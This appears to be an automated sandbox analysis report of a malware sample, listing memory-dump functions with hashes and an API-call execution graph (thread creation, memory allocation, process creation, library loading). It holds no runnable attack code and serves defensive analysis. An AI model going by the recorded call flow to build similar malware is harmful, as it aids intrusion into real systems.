                                                            Function 00FD3010 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cf9a68cdf99c1bf19d97d20546a6666d1a954fffc655ef3175b44c291e3e1b3e
                                                            • Instruction ID: 1cec060edafa8303c2ce67d5f90f980be6df5846b4f63c24c08ebba9a7e883a9
                                                            • Opcode Fuzzy Hash: cf9a68cdf99c1bf19d97d20546a6666d1a954fffc655ef3175b44c291e3e1b3e
                                                            • Instruction Fuzzy Hash: BB90022120188452D24072598804B0F410587E1742F95C03AA4196554DCD1989566722
                                                            Function 00FD39B0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a9ad8ba62cd152e5f38acd860716217b22b649eaea211e8b5fa7f71b22244173
                                                            • Instruction ID: 11c18c6cb1bafa70c73bf21c3eb296ff7658d41f845bed878c1542310f82916c
                                                            • Opcode Fuzzy Hash: a9ad8ba62cd152e5f38acd860716217b22b649eaea211e8b5fa7f71b22244173
                                                            • Instruction Fuzzy Hash: 9090022124549112D250715D84046164005A7E0741F55C032A0854594E895989567222
                                                            Function 00FD3D70 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 559267effcf4eafb8850a0ddddaf03c3dd8fea900713110e69a75d9857f00435
                                                            • Instruction ID: 236d19af38a4c08d79b9fba723b5fcbdabdfa44b3c8ee91fd799b256bca76a79
                                                            • Opcode Fuzzy Hash: 559267effcf4eafb8850a0ddddaf03c3dd8fea900713110e69a75d9857f00435
                                                            • Instruction Fuzzy Hash: 1990023520144412D61071599804646004687D0741F55D432A0464558E8A5889A2B122
                                                            Function 00FD3D10 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a0f8ac6721ed001bf6799e0e0eacbb5c307dc0d605e9c31ec18a00c3e963a983
                                                            • Instruction ID: d838254ec24988efef270d6353512ec20a7bd8d90a3668ee7fa8f22afa6edad5
                                                            • Opcode Fuzzy Hash: a0f8ac6721ed001bf6799e0e0eacbb5c307dc0d605e9c31ec18a00c3e963a983
                                                            • Instruction Fuzzy Hash: 0490023120244152964072599804A4E410587E1742B95D436A0055554DCD1889626222
                                                            Function 00FD2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                            • Instruction ID: 46f3d5e1e08c1fe94718af74812445e3bdabf2b5f63842a69b7032363e720002
                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                            • Instruction Fuzzy Hash:
                                                            Function 00FD2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: c7db5358ecc2dc51fff9bc9cb5a829b39f61e3c90ad9b4579aeacee396ac6e74
                                                            • Instruction ID: 95f2491547385ac238d578517c86b7712d51ff16b747792211030c427b6ae5b0
                                                            • Opcode Fuzzy Hash: c7db5358ecc2dc51fff9bc9cb5a829b39f61e3c90ad9b4579aeacee396ac6e74
                                                            • Instruction Fuzzy Hash: C85127B2E04216BFDB61DB98C89097EF7B9BB18300B14826AE495D3381D734DE40B7E1
                                                            Function 01042410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: 9bd67a279ba38630814d03e81cbc05ec09a846a4499d814d58bec043f3fc2335
                                                            • Instruction ID: 1238b3d0e57a0b1036051833e31c8c37207b752d7008bb149943240196151eaf
                                                            • Opcode Fuzzy Hash: 9bd67a279ba38630814d03e81cbc05ec09a846a4499d814d58bec043f3fc2335
                                                            • Instruction Fuzzy Hash: 9451F6B5B00645AFCB60DE9CD8D097EB7F8EF44200B4484A9F4D6D7642DAB4DA4087A0
                                                            Function 00FC7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01004742
                                                            • Execute=1, xrefs: 01004713
                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01004787
                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01004655
                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010046FC
                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01004725
                                                            • ExecuteOptions, xrefs: 010046A0
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                            • API String ID: 0-484625025
                                                            • Opcode ID: 7af579516d627b19c38d1140967e63c5ca9f4165a73cdd3837cc3506e16f28c0
                                                            • Instruction ID: 6b561a8eff516141215b1b992d8f0ce44d2e5b7ba18ef120711d6da4340ac50a
                                                            • Opcode Fuzzy Hash: 7af579516d627b19c38d1140967e63c5ca9f4165a73cdd3837cc3506e16f28c0
                                                            • Instruction Fuzzy Hash: F1514931A0431A6AEF21BAA4DD87FED77A8FF04310F14009DE609A71C1E7759E45AF51
                                                            Function 01066940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                            • Instruction ID: 4d0c9d37f20c3d8804a989698ee5d92530b9ee6303597c054437a802d271324d
                                                            • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                            • Instruction Fuzzy Hash: F5023571508341AFD345CF18C890A6FBBE9EFC8704F048A6DF9858B265DB36E945CB42
                                                            Function 00FDB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-$0$0
                                                            • API String ID: 1302938615-699404926
                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction ID: fb7fca438397dbaad376aef8f667f9a83dab5c3057d83f4734f495bedd64fd0c
                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction Fuzzy Hash: E581CE31E05249DBDF249F68C8917FEBBA7AF85360F1E425BE861A7391C7348841EB50
                                                            Function 010420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$[$]:%u
                                                            • API String ID: 48624451-2819853543
                                                            • Opcode ID: 8fa22363f2c11456529abdd32a5387d112bcdfee7b415a2aa07f8b5fe4ad5408
                                                            • Instruction ID: 52b2ce043642e3448ffd717c9635a9494e64d709d43d81881752e7c56a549b2e
                                                            • Opcode Fuzzy Hash: 8fa22363f2c11456529abdd32a5387d112bcdfee7b415a2aa07f8b5fe4ad5408
                                                            • Instruction Fuzzy Hash: A521A6BAA00119ABDB10DF69DC91AEEBBE8AF54740F040166F944D3201EB30DA01D7A1
                                                            Function 00FBF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010002BD
                                                            • RTL: Re-Waiting, xrefs: 0100031E
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010002E7
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                            • API String ID: 0-2474120054
                                                            • Opcode ID: ad9fcd4f2c4f2ba2a05945554092e599a1ef5964ac2b40f617d001d28d26b559
                                                            • Instruction ID: a0686b0f0295d9e0f3902db412c8b0dc688c1dbf191d47d29243c32f552cf6fe
                                                            • Opcode Fuzzy Hash: ad9fcd4f2c4f2ba2a05945554092e599a1ef5964ac2b40f617d001d28d26b559
                                                            • Instruction Fuzzy Hash: 3FE1F2316087419FE722CF29CC84B9AB7E1BF84364F244A6DF5A58B2D1D774D848DB42
                                                            Function 00FCBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RTL: Resource at %p, xrefs: 01007B8E
                                                            • RTL: Re-Waiting, xrefs: 01007BAC
                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01007B7F
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 0-871070163
                                                            • Opcode ID: ba035766cc1ec2b9c0fdb12e7a1eee0b090a7cf5808ca48739084fb76cc4d10a
                                                            • Instruction ID: a38fd9c506b608133f0c863a6c26781efa9e5a05588b0c72c9eff041f4dd2ce3
                                                            • Opcode Fuzzy Hash: ba035766cc1ec2b9c0fdb12e7a1eee0b090a7cf5808ca48739084fb76cc4d10a
                                                            • Instruction Fuzzy Hash: D64101357007038BD720DE28CD42F6AB7E5EB98720F100A1DF99A9B380DB70E805DB91
                                                            Function 00FCB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0100728C
                                                            Strings
                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01007294
                                                            • RTL: Resource at %p, xrefs: 010072A3
                                                            • RTL: Re-Waiting, xrefs: 010072C1
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 885266447-605551621
                                                            • Opcode ID: 9d0ba78bd98425936fb2faf8b0e587be6eac0ce528b497a75effe8e5da0c567c
                                                            • Instruction ID: 99262aa43bc31bfae7c68b4f20eec6bceacfb4642585526608bc127cb133a191
                                                            • Opcode Fuzzy Hash: 9d0ba78bd98425936fb2faf8b0e587be6eac0ce528b497a75effe8e5da0c567c
                                                            • Instruction Fuzzy Hash: 63412036704207ABD721DE24CC42FAAB7A5FB54710F100619F9C9AB281DB39F8029BD1
                                                            Function 01042300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$]:%u
                                                            • API String ID: 48624451-3050659472
                                                            • Opcode ID: 841f2951779ca65dd4a0733e8da54c105f2dce6ddb0483a24f421a6047a981b6
                                                            • Instruction ID: d471fd314324be9d19b35db5a02c20ffd5fd43015884da4f72095c2b6b3c04d6
                                                            • Opcode Fuzzy Hash: 841f2951779ca65dd4a0733e8da54c105f2dce6ddb0483a24f421a6047a981b6
                                                            • Instruction Fuzzy Hash: CE318772A002199FDB60DF29DC80BEE77F8EB44611F4545A6F989D3241EB30AA449F60
                                                            Function 00FD7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-
                                                            • API String ID: 1302938615-2137968064
                                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction ID: 133db16d12636160b5ea82114bcac00743c6155591020bc13e51d3af50908efa
                                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction Fuzzy Hash: C8918471E083169ADB24EF59C8816BEB7A3AF44360F5C451BE855AB380E6349D41A750
                                                            Function 00F99126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $$@
                                                            • API String ID: 0-1194432280
                                                            • Opcode ID: f1cb6acf18d18e433d2710bfed061643ee530ca6a22182eb4ec27d4e5bd5461e
                                                            • Instruction ID: 6b2d9cd1cb083571a1dda2fbc043fdb54b1fb6163edc31767cf78c6a0c0edea6
                                                            • Opcode Fuzzy Hash: f1cb6acf18d18e433d2710bfed061643ee530ca6a22182eb4ec27d4e5bd5461e
                                                            • Instruction Fuzzy Hash: 7B813A72D042699BDB31CF54CC45BEEB7B8AF48710F0541EAAA09B7290D7749E84DFA0

                                                            Execution Graph

                                                            Execution Coverage:2.5%
                                                            Dynamic/Decrypted Code Coverage:4.2%
                                                            Signature Coverage:2.2%
                                                            Total number of Nodes:452
                                                            Total number of Limit Nodes:74
                                                            execution_graph 101436 be8b3b 101438 be8b45 101436->101438 101437 be8ab6 101438->101437 101440 be7400 101438->101440 101441 be7416 101440->101441 101443 be744f 101440->101443 101441->101443 101444 be7270 LdrLoadDll 101441->101444 101443->101437 101444->101443 101445 bd9df0 101446 bd9dff 101445->101446 101447 bd9e40 101446->101447 101448 bd9e2d CreateThread 101446->101448 101464 3852ad0 LdrInitializeThunk 101465 bdb7e0 101468 bfb8d0 101465->101468 101467 bdce51 101471 bf99d0 101468->101471 101470 bfb901 101470->101467 101472 bf9a65 101471->101472 101474 bf99fb 101471->101474 101473 bf9a7b NtAllocateVirtualMemory 101472->101473 101473->101470 101474->101470 101475 be9f63 101477 be9f6f 101475->101477 101476 be9f76 101477->101476 101479 bfb960 101477->101479 101482 bf9be0 101479->101482 101481 bfb979 101481->101476 101483 bf9bfd 101482->101483 101484 bf9c0e RtlFreeHeap 101483->101484 101484->101481 101485 be10a0 101486 be10ba 101485->101486 101488 be10d8 101486->101488 101491 be4890 101486->101491 101489 be110c PostThreadMessageW 101488->101489 101490 be111d 101488->101490 101489->101490 101492 be48b4 101491->101492 101493 be48bb 101492->101493 101494 be48f3 LdrLoadDll 101492->101494 101493->101488 101494->101493 101495 be7660 101496 be76d2 101495->101496 101497 be7678 101495->101497 101497->101496 101499 beb5d0 101497->101499 101501 beb5f6 101499->101501 101500 beb829 101500->101496 101501->101500 101526 bf9c70 101501->101526 101503 beb66c 101503->101500 101529 bfcb30 101503->101529 101505 beb68b 101505->101500 101506 beb762 101505->101506 101535 bf8ea0 101505->101535 101509 be5e80 LdrInitializeThunk 101506->101509 101512 beb781 101506->101512 101509->101512 101510 beb6f6 101510->101500 101520 beb728 101510->101520 101522 beb74a 101510->101522 101539 be5e80 101510->101539 101511 beb811 101518 be8450 LdrInitializeThunk 101511->101518 101512->101511 101546 bf8a10 101512->101546 101519 beb81f 101518->101519 101519->101496 101561 bf4b20 LdrInitializeThunk 101520->101561 101521 beb7e8 101551 bf8ac0 101521->101551 101542 be8450 101522->101542 101524 beb802 101556 bf8c20 101524->101556 101527 bf9c8a 101526->101527 101528 bf9c9b CreateProcessInternalW 101527->101528 101528->101503 101530 bfcaa0 101529->101530 101531 bfcafd 101530->101531 101562 bfba40 101530->101562 101531->101505 101533 bfcada 101534 bfb960 RtlFreeHeap 101533->101534 101534->101531 101536 bf8eba 101535->101536 101568 3852c0a 101536->101568 101537 beb6ed 101537->101506 101537->101510 101571 bf9070 101539->101571 101541 be5ebe 101541->101520 101543 be8463 101542->101543 101577 bf8da0 101543->101577 101545 be848e 101545->101496 101547 bf8a8d 101546->101547 101548 bf8a3b 101546->101548 101583 38539b0 LdrInitializeThunk 101547->101583 101548->101521 101549 bf8ab2 101549->101521 101552 bf8b40 101551->101552 101554 bf8aee 101551->101554 101584 3854340 LdrInitializeThunk 101552->101584 101553 bf8b65 101553->101524 101554->101524 101557 bf8ca0 101556->101557 101558 bf8c4e 101556->101558 101585 3852fb0 LdrInitializeThunk 101557->101585 101558->101511 101559 bf8cc5 101559->101511 101561->101522 101565 bf9b90 101562->101565 101564 bfba5b 101564->101533 101566 bf9baa 101565->101566 101567 bf9bbb RtlAllocateHeap 101566->101567 101567->101564 101569 3852c1f LdrInitializeThunk 101568->101569 101570 3852c11 101568->101570 101569->101537 101570->101537 101572 bf909f 101571->101572 101573 bf9121 101571->101573 101572->101541 101576 3852d10 LdrInitializeThunk 101573->101576 101574 bf9166 101574->101541 101576->101574 101578 bf8e21 101577->101578 101580 bf8dce 101577->101580 101582 3852dd0 LdrInitializeThunk 101578->101582 101579 bf8e46 101579->101545 101580->101545 101582->101579 101583->101549 101584->101553 101585->101559 101586 befba0 101587 befc04 101586->101587 101615 be6610 101587->101615 101589 befd3e 101590 befd37 101590->101589 101622 be6720 101590->101622 101592 befee3 101593 befdba 101593->101592 101594 befef2 101593->101594 101626 bef980 101593->101626 101596 bf9870 NtClose 101594->101596 101597 befefc 101596->101597 101598 befdf6 101598->101594 101599 befe01 101598->101599 101600 bfba40 RtlAllocateHeap 101599->101600 101601 befe2a 101600->101601 101602 befe49 101601->101602 101603 befe33 101601->101603 101635 bef870 CoInitialize 101602->101635 101604 bf9870 NtClose 101603->101604 101606 befe3d 101604->101606 101607 befe57 101638 bf9310 101607->101638 101609 befed2 101642 bf9870 101609->101642 101611 befedc 101613 bfb960 RtlFreeHeap 101611->101613 101612 befe75 101612->101609 101614 bf9310 LdrInitializeThunk 101612->101614 101613->101592 101614->101612 101616 be6643 101615->101616 101617 be6667 101616->101617 101645 bf93c0 101616->101645 101617->101590 101619 be668a 101619->101617 101620 bf9870 NtClose 101619->101620 101621 be670a 101620->101621 101621->101590 101623 be6745 101622->101623 101650 bf91c0 101623->101650 101627 bef99c 101626->101627 101628 be4890 LdrLoadDll 101627->101628 101630 bef9ba 101628->101630 101629 bef9c3 101629->101598 101630->101629 101631 be4890 LdrLoadDll 101630->101631 101632 befa8e 101631->101632 101633 be4890 LdrLoadDll 101632->101633 101634 befae8 101632->101634 101633->101634 101634->101598 101637 bef8d5 101635->101637 101636 bef96b CoUninitialize 101636->101607 101637->101636 101639 bf932d 101638->101639 101655 3852ba0 LdrInitializeThunk 101639->101655 101640 bf935d 101640->101612 101643 bf988a 101642->101643 101644 bf989b NtClose 101643->101644 101644->101611 101646 bf93dd 101645->101646 101649 3852ca0 LdrInitializeThunk 101646->101649 101647 bf9409 101647->101619 101649->101647 101651 bf91da 101650->101651 101654 3852c60 LdrInitializeThunk 101651->101654 101652 be67b9 101652->101593 101654->101652 101655->101640 101656 bf04a0 101657 bf04c3 101656->101657 101658 be4890 LdrLoadDll 101657->101658 101659 bf04e7 101658->101659 101660 bf1ea0 101661 bf1eb9 101660->101661 101662 bf1f01 101661->101662 101665 bf1f41 101661->101665 101667 bf1f46 101661->101667 101663 bfb960 RtlFreeHeap 101662->101663 101664 bf1f11 101663->101664 101666 bfb960 RtlFreeHeap 101665->101666 101666->101667 101668 bfca60 101669 bfb960 RtlFreeHeap 101668->101669 101670 bfca75 101669->101670 101671 bf9560 101672 bf961a 101671->101672 101674 bf9592 101671->101674 101673 bf9630 NtCreateFile 101672->101673 101675 be715a 101676 be712c 101675->101676 101679 be715f 101675->101679 101680 be8280 101676->101680 101678 be7134 101681 be829d 101680->101681 101687 bf8f90 101681->101687 101683 be82ed 101684 be82f4 101683->101684 101685 bf9070 LdrInitializeThunk 101683->101685 101684->101678 101686 be831d 101685->101686 101686->101678 101688 bf8fbe 101687->101688 101689 bf902e 101687->101689 101688->101683 101692 3852f30 LdrInitializeThunk 101689->101692 101690 bf9067 101690->101683 101692->101690 101695 bd9e50 101698 bda0d2 101695->101698 101697 bda5a3 101698->101697 101699 bfb5a0 101698->101699 101700 bfb5c4 101699->101700 101705 bd4060 101700->101705 101702 bfb5e3 101703 bfb61c 101702->101703 101708 bf59a0 101702->101708 101703->101697 101712 be3540 101705->101712 101707 bd406d 101707->101702 101709 bf5a01 101708->101709 101711 bf5a0e 101709->101711 101748 be1ce0 101709->101748 101711->101703 101714 be355d 101712->101714 101713 be3576 101713->101707 101714->101713 101719 bfa2b0 101714->101719 101716 be35d1 101716->101713 101726 bf6100 101716->101726 101718 be3622 101718->101707 101721 bfa2ca 101719->101721 101720 bfa2f9 101720->101716 101721->101720 101722 bf8ea0 LdrInitializeThunk 101721->101722 101723 bfa359 101722->101723 101724 bfb960 RtlFreeHeap 101723->101724 101725 bfa372 101724->101725 101725->101716 101727 bf6165 101726->101727 101728 bf6190 101727->101728 101731 be31b0 101727->101731 101728->101718 101730 bf6172 101730->101718 101733 be31be 101731->101733 101732 be319c 101732->101730 101733->101732 101737 be80d0 101733->101737 101736 bf9870 NtClose 101736->101732 101738 be3443 101737->101738 101739 be80ea 101737->101739 101738->101732 101738->101736 101743 bf8f40 101739->101743 101742 bf9870 NtClose 101742->101738 101744 bf8f5a 101743->101744 101747 38535c0 LdrInitializeThunk 101744->101747 101745 be81ba 101745->101742 101747->101745 101749 be1d1b 101748->101749 101764 be81e0 101749->101764 101751 be1d23 101752 be2006 101751->101752 101753 bfba40 RtlAllocateHeap 101751->101753 101752->101711 101754 be1d39 101753->101754 101755 bfba40 RtlAllocateHeap 101754->101755 101756 be1d4a 101755->101756 101757 bfba40 RtlAllocateHeap 101756->101757 101759 be1d5b 101757->101759 101763 be1df2 101759->101763 101779 be6d70 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 101759->101779 101760 be4890 LdrLoadDll 101761 be1fb2 101760->101761 101775 bf82e0 101761->101775 101763->101760 101765 be820c 101764->101765 101766 be80d0 2 API calls 101765->101766 101767 be822f 101766->101767 101768 be8239 101767->101768 101769 be8251 101767->101769 101770 be8244 101768->101770 101772 bf9870 NtClose 101768->101772 101771 be826d 101769->101771 101773 bf9870 NtClose 101769->101773 101770->101751 101771->101751 101772->101770 101774 be8263 101773->101774 101774->101751 101776 bf8342 101775->101776 101778 bf834f 101776->101778 101780 be2020 101776->101780 101778->101752 101779->101763 101796 be84b0 101780->101796 101782 be2040 101789 be25a3 101782->101789 101800 bf14d0 101782->101800 101785 be2254 101786 bfcb30 2 API calls 101785->101786 101790 be2269 101786->101790 101787 be209e 101787->101789 101803 bfca00 101787->101803 101788 be8450 LdrInitializeThunk 101792 be22b9 101788->101792 101789->101778 101790->101792 101808 be0b20 101790->101808 101792->101788 101792->101789 101793 be0b20 LdrInitializeThunk 101792->101793 101793->101792 101794 be2413 101794->101792 101795 be8450 LdrInitializeThunk 101794->101795 101795->101794 101797 be84bd 101796->101797 101798 be84de SetErrorMode 101797->101798 101799 be84e5 101797->101799 101798->101799 101799->101782 101801 bfb8d0 NtAllocateVirtualMemory 101800->101801 101802 bf14f1 101801->101802 101802->101787 101804 bfca16 101803->101804 101805 bfca10 101803->101805 101806 bfba40 RtlAllocateHeap 101804->101806 101805->101785 101807 bfca3c 101806->101807 101807->101785 101809 be0b3d 101808->101809 101812 bf9af0 101809->101812 101813 bf9b0d 101812->101813 101816 3852c70 LdrInitializeThunk 101813->101816 101814 be0b42 101814->101794 101816->101814 101817 beb090 101822 beada0 101817->101822 101819 beb09d 101836 beaa20 101819->101836 101821 beb0b9 101823 beadc5 101822->101823 101847 be86c0 101823->101847 101826 beaf13 101826->101819 101828 beaf2a 101828->101819 101829 beaf21 101829->101828 101831 beb017 101829->101831 101866 bea470 101829->101866 101833 beb07a 101831->101833 101875 bea7e0 101831->101875 101834 